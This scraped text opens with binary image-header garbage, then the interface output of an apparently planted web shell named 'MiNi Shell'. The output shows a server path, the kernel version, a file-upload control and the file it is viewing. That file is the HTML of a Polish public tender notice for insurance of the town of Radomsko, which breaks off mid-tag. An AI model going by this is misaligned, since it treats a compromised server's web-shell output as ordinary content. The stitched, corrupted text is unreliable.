JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240408/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240408/0027579101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie ubezpieczenia mienia, odpowiedzialności cywilnej, pojazdów i NNW dla Miasta Radomsko oraz wybranych jednostek </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Radomsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tysiąclecia 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@radomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.radomsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">PWS Konstanta S.A.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">9370006146</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Warszawska 153</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">z.nowak@pwskonstanta.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie ubezpieczenia mienia, odpowiedzialności cywilnej, pojazdów i NNW dla Miasta Radomsko oraz wybranych jednostek </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1b2701a2-f594-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00275791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00040113/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Świadczenie usług w zakresie ubezpieczenia mienia odpowiedzialości cywilnej, pojazdów i NNW dla Miasta Radomska i wyranych jednostek w okresie 1.12.2024-30.11.2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1b2701a2-f594-11ee-b016-82aaee56c84c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie zamówienia publicznego komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl<br/>2.Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ:<br/>2.1.za pośrednictwem Platformy e-Zamówienia, lub <br/>2.2. poczty elektronicznej z.nowak@pwskonstanta.pl (nie dotyczy składania ofert).<br/>3.Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Oferty należy złożyć za pomocą platformy e-Zamówienia https://ezamowienia.gov.pl/ Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>3. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) pod adresem https://ezamowienia.gov.pl. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: z.nowak@pwskonstanta.pl<br/>6. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały określone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej zwane „RODO”, zamawiający, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Miasto Radomsko, ul. Tysiąclecia 5, 97-500 Radomsko, telefon: 44 685 45 00, 44 685 45 10, 44 685 45 20; e-mail: um@radomsko.pl,<br/>2)	z inspektorem ochrony danych osobowych lub zastępcą inspektora danych w Gminie Miasto Radomsko można się kontaktować pod adresem e-mail: abi@radomsko.pl, telefonicznie pod numerem telefonu 44 685 44 72 lub pisemnie na adres siedziby.<br/>2.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem pod nazwą „Świadczenie usług w zakresie ubezpieczenia mienia, odpowiedzialności cywilnej, pojazdów i NNW dla Miasta Radomsko oraz wybranych jednostek”, numer PZP.271.1.7.2024, prowadzonym w trybie podstawowym bez negocjacji.<br/>1)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 74 ust. 1 PZP, lub dokumentacja z realizacji zadania, w oparciu o obowiązujące przepisy prawa w tym ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej lub na podstawie umów zawartych z administratorem. <br/>2)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 lub ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas trwania umowy ubezpieczenia przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane osobowe będą archiwizowane również zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, w tym przez okres niezbędny do dochodzenia roszczeń. <br/>3.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>4.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>5.	Posiada Pani/Pan: <br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**,<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***<br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, <br/>6.	Nie przysługuje Pani/Panu: <br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, <br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: zgodnie z art. 19 ust. 2 ustawy Pzp, skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z PZP.<br/>*** Wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp, w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.1.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 Ubezpieczenia mienia i OC<br/>1	Ubezpieczenie mienia od ognia i innych zdarzeń losowych.<br/>2	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk.<br/>3	Ubezpieczenie mienia od kradzieży z włamaniem, rabunku i wandalizmu.<br/>4	Ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzenia działalności oraz z tytułu posiadania mienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Postanowienia dotyczące opcji zostały określone w projektowanych postanowieniach umowy dla tej części zamówienia. <br/>Opcja zwiększająca (doubezpieczenia) - 10% składki za zamówienie podstawowe.<br/>Opcja zmniejszająca - 20% składki za zamówienie podstawowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający w Części 1 przewiduje udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, dotychczasowemu wykonawcy usług (wykonawcy któremu zostanie udzielone zamówienie), zamówienia polegającego na powtórzeniu podobnych usług do usług objętych przedmiotowym zamówieniem, o całkowitej wartości wynoszącej 5% wartości zamówienia (zamówienia podstawowego). Zakres usług obejmuje ubezpieczenia podobne do ubezpieczeń wchodzących w skład przedmiotowego zamówienia. Warunkiem udzielania tego zamówienia będą uzasadnione potrzeby zamawiającego wynikające z jego bieżącej działalności.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane punktowo. <br/>Oferty (ważne, niepodlegające odrzuceniu) zostaną ocenione przez zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę:<br/>Kryterium nr 1: Cena - 60 pkt /waga 60%<br/>Kryterium nr 2: Warunki dodatkowe – 40 pkt / waga 40%<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = Pc + Pk<br/>gdzie:<br/>P – ogólna liczba punktów<br/>Pc - punkty otrzymane w kryterium „Cena”<br/>Pk - punkty otrzymane w kryterium „Warunki dodatkowe”<br/>Kryterium nr 1 „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez wykonawcę w formularzu ofertowym ceny za wykonanie zamówienia podstawowego w zakresie objętym SWZ. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone według wzoru:<br/>Pc = (najniższa zaoferowana cena spośród ofert ważnych niepodlegających odrzuceniu/cena oferty badanej)*0,6 (60%)*100<br/>P_c – liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 1.<br/><br/>Kryterium nr 2 „Warunki dodatkowe” punkty za to kryterium zostaną przyznane na podstawie oświadczenia wykonawcy złożonego w formularzu oferty. Ocena dokonana zostanie na podstawie sumy uzyskanych punktów za warunki dodatkowe. Brak oświadczenia wykonawcy (pozostawienie niewypełnionego miejsca) przy warunkach dodatkowych, zostanie uznany przez zamawiającego za „bez zmian” i akceptacje wyłączenie warunku minimalnego z OPZ – oraz przyznanie 0 punków. Zaakceptowanie (podanie TAK) oznacza akceptacje wybranych klauzul fakultatywnych i będzie tożsame z zastosowaniem treści tych klauzul w umowie ubezpieczenia. Treść klauzul fakultatywnych stanowiących warunki dodatkowe została podana w opisie ubezpieczanych ryzyk w odpowiednim załączniku do SWZ: dla Części 1: w załączniku A do SWZ, dla Części 2: w załączniku B do SWZ, dla Części 3: w załączniku C do SWZ, dla Części 4: w załączniku D do SWZ, dla Części 5: w załączniku E do SWZ.<br/><br/>Wyliczenie liczby przyznanych punktów w kryterium nr 2: warunki dodatkowe: <br/>P_k=F_o/F_n x W_k x 100<br/>Pk - liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 2 <br/>Fo - łączna liczba punktów uzyskanych przez ocenianą ofertę za zaakceptowanie wybranych klauzul fakultatywnych<br/>Fn - maksymalna możliwa do uzyskania liczba punktów za zaakceptowanie wszystkich klauzul fakultatywnych<br/>Wk - waga kryterium nr 2 (40%) w postaci ułamka dziesiętnego (0,40)<br/><br/>Szczegółowy sposób oceny ofert opisany został w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 Ubezpieczenie odpowiedzialności cywilnej nadwyżkowej<br/>1	Ubezpieczenie odpowiedzialności cywilnej nadwyżkowej z tytułu prowadzenia działalności oraz z tytułu posiadania mienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane punktowo. <br/>Oferty (ważne, niepodlegające odrzuceniu) zostaną ocenione przez zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę:<br/>Kryterium nr 1: Cena - 60 pkt /waga 60%<br/>Kryterium nr 2: Warunki dodatkowe – 40 pkt / waga 40%<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = Pc + Pk<br/>gdzie:<br/>P – ogólna liczba punktów<br/>Pc - punkty otrzymane w kryterium „Cena”<br/>Pk - punkty otrzymane w kryterium „Warunki dodatkowe”<br/>Kryterium nr 1 „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez wykonawcę w formularzu ofertowym ceny za wykonanie zamówienia podstawowego w zakresie objętym SWZ. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone według wzoru:<br/>Pc = (najniższa zaoferowana cena spośród ofert ważnych niepodlegających odrzuceniu/cena oferty badanej)*0,6 (60%)*100<br/>P_c – liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 1.<br/><br/>Kryterium nr 2 „Warunki dodatkowe” punkty za to kryterium zostaną przyznane na podstawie oświadczenia wykonawcy złożonego w formularzu oferty. Ocena dokonana zostanie na podstawie sumy uzyskanych punktów za warunki dodatkowe. Brak oświadczenia wykonawcy (pozostawienie niewypełnionego miejsca) przy warunkach dodatkowych, zostanie uznany przez zamawiającego za „bez zmian” i akceptacje wyłączenie warunku minimalnego z OPZ – oraz przyznanie 0 punków. Zaakceptowanie (podanie TAK) oznacza akceptacje wybranych klauzul fakultatywnych i będzie tożsame z zastosowaniem treści tych klauzul w umowie ubezpieczenia. Treść klauzul fakultatywnych stanowiących warunki dodatkowe została podana w opisie ubezpieczanych ryzyk w odpowiednim załączniku do SWZ: dla Części 1: w załączniku A do SWZ, dla Części 2: w załączniku B do SWZ, dla Części 3: w załączniku C do SWZ, dla Części 4: w załączniku D do SWZ, dla Części 5: w załączniku E do SWZ.<br/><br/>Wyliczenie liczby przyznanych punktów w kryterium nr 2: warunki dodatkowe: <br/>P_k=F_o/F_n x W_k x 100<br/>Pk - liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 2 <br/>Fo - łączna liczba punktów uzyskanych przez ocenianą ofertę za zaakceptowanie wybranych klauzul fakultatywnych<br/>Fn - maksymalna możliwa do uzyskania liczba punktów za zaakceptowanie wszystkich klauzul fakultatywnych<br/>Wk - waga kryterium nr 2 (40%) w postaci ułamka dziesiętnego (0,40)<br/><br/>Szczegółowy sposób oceny ofert opisany został w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów 